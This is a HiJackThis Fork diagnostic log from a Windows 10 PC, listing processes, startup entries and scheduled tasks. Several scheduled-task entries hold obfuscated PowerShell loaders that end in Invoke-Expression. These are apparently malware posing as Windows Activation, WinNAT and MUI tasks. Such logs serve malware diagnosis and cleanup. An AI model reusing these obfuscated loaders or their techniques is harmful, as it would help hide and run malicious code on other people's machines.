Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Platform: x64 Windows 10 (Home Single Language), 10.0.19044.1499 (ReleaseId: 2009, 21H2), Service Pack: 0
Time: 23.01.2022 - 13:21 (UTC+03:00)
Language: OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated: Yes
Ran by: CASPER (group: Administrators) on CASPERNIRVANA, FirstRun: yes
Chrome: 97.0.4692.71
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)
Boot mode: Normal
Running processes:
Number | Path
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
1 C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
1 C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
1 C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe
1 C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
1 C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
1 C:\Program Files (x86)\Steam\steam.exe
1 C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
1 C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\McCSPServiceHost.exe
1 C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
3 C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
1 C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
1 C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
1 C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
1 C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
1 C:\Program Files\Common Files\McAfee\VSCore_21_4\mcapexe.exe
1 C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
1 C:\Program Files\Elantech\ETDCtrl.exe
1 C:\Program Files\Elantech\ETDCtrlHelper.exe
1 C:\Program Files\Elantech\ETDService.exe
1 C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
1 C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
1 C:\Program Files\McAfee\WebAdvisor\servicehost.exe
1 C:\Program Files\McAfee\WebAdvisor\uihost.exe
1 C:\Program Files\Riot Vanguard\vgtray.exe
1 C:\Program Files\SteelSeries\GG\moments\SteelSeriesSvcLauncher.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesEngine.exe
1 C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
1 C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
1 C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe
2 C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe
1 C:\Users\CASPER\Desktop\HiJackThis.exe
1 C:\Windows\explorer.exe
1 C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
1 C:\Windows\System32\audiodg.exe
1 C:\Windows\System32\backgroundTaskHost.exe
4 C:\Windows\System32\conhost.exe
2 C:\Windows\System32\csrss.exe
1 C:\Windows\System32\ctfmon.exe
1 C:\Windows\System32\dasHost.exe
1 C:\Windows\System32\dwm.exe
2 C:\Windows\System32\fontdrvhost.exe
1 C:\Windows\System32\igfxCUIService.exe
1 C:\Windows\System32\igfxHK.exe
1 C:\Windows\System32\lsass.exe
1 C:\Windows\System32\mfevtps.exe
1 C:\Windows\System32\MusNotification.exe
2 C:\Windows\System32\RuntimeBroker.exe
1 C:\Windows\System32\SearchFilterHost.exe
1 C:\Windows\System32\SearchIndexer.exe
1 C:\Windows\System32\SearchProtocolHost.exe
1 C:\Windows\System32\SecurityHealthService.exe
1 C:\Windows\System32\services.exe
1 C:\Windows\System32\SettingSyncHost.exe
1 C:\Windows\System32\SgrmBroker.exe
1 C:\Windows\System32\sihost.exe
1 C:\Windows\System32\smss.exe
1 C:\Windows\System32\snmp.exe
1 C:\Windows\System32\spoolsv.exe
82 C:\Windows\System32\svchost.exe
1 C:\Windows\System32\taskhostw.exe
1 C:\Windows\System32\wbem\unsecapp.exe
1 C:\Windows\System32\wbem\WmiPrvSE.exe
1 C:\Windows\System32\wermgr.exe
2 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
1 C:\Windows\System32\wininit.exe
1 C:\Windows\System32\winlogon.exe
1 C:\Windows\System32\WUDFHost.exe
1 C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
1 C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
1 C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk -> C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='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';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''pkCb3R0bXRFJocmbxZHbpJXc2xGdTRXZxZHbH5COGFndsRVV6oTXn5WaxZHbk92YxZHbuVkL0hXc2xWZU5SblRXc2x2c5FndsN1WogXc2xWZxZHbptTKyVmYxZHbtVnbsFndsFWayV2Uuclb1ZXRi9GJrcCInsCblRWc2x2bN5yVuVndFJ2bkgCIpkybDJUdLZHJocmbpJHdxZHbTRTc2xmNlNXYxZHbC12bxZHbyZkO60FdyVmdxZHbu92Qu0WZ0FndsNXeTtFKgMWc2xWZk1Db3R0bXRFJ7IXZi1Wc2xWduxWYpFndsJXZTxCblFndsR2bNBCdjVWc2xGblNHf9dCMFZVSSRETBFndsNUSTlFSQxlLcx1JgEXZtACRJVWc2x2YpZXZE5yXksHIlJXc2xWZodHflZXaxZHbyR2axZHbzlGZfJzMxZHbulWc2x2dgkWbxZHb3dWPX5Wd2VkYvRSf7kERLZ0QkAibyFndsVHdlJXfrsyVuVndFRyOORXbmRCIy9Gei1CIddlb1ZXRksVdFBlVkAicvFndshnYtASX1hFRVJFUksVSEtkRDRSPdVHWEVlUQRyWJR0SGNEJ74EdtZGJgI3bxZHb4JWLgkiM1EDIy9mYtAiT01mZkACZuFndsFmYtAyMygSPORXbmRSfw0zVuVndFRyepQnb192QuUXRQZFJgU2ZtAyVuVndFRCKml2epsyK1hFRVJFUksDduV3bD5SSEtkRDRCI0xWLgUHWEVlUQRyOw0TdYRUVSBFJoI3bxZHbmtDM9clb1ZXRksTXwsVdFBlVk0jT01mZksTKSlVWX5kekgyclFndsRXeCRXc2xWZH5COGRVV6oTXn5Wc2xWak92YuVkL0FndshXZU5SblFndsR3c5N1W9UXRQZFJ7liUZl1VOpHJddmbpJXc2xGdztFLJR0SGNEJd11WlRXc2xWeitFKjVWc2xGZg42bpR3YxZHbuVnZ'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb(j5@u_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ e_ifhgr[Nd_,(+_Iyn_{tPzkt.r8_)0iw,4rp_eflm _z]wcso4n_fn_,0x8xe17w00!j05,?[0x=f4_0-8);5fM8a97rsjuhqa_8l.0nC6opapy0_(cjpxFPk(t_x.2,0.{,!i{_frj5N?,s8sJ{oJhKwe);36(7(?_WJ__i_m__)M_{a1radsho?a-l+!.Gq4eat3hDek4l4eg_gakgt/e0_Fo2hr/F?_uneqc+t]_io)8npP_1oi=2n_tr-erlc(xi__fr),Nn,07tyi7ple_0of8_(1W3{Jirpmr)6+))dz(j)__;}uz[iD4slli_I?m.7po_]r,t_p(u_byeCpyra0znhtv3dl1rl}u_oyCh_r=a?8)]oqpqr8_iv[_amtr_e j2s_t,_ato4ifc_m ec}x)t_]er_hn8 3dlovonig]- Np{t_A=2lla_ouc_]aty!e]V3mir=jt_u_xalo4Mye!6mo2or3y__(I_3n_t_{Ptpcr_ _/Np_=Poh}_q,c_r2eu{f _(Imn97tP,xtjr}_ 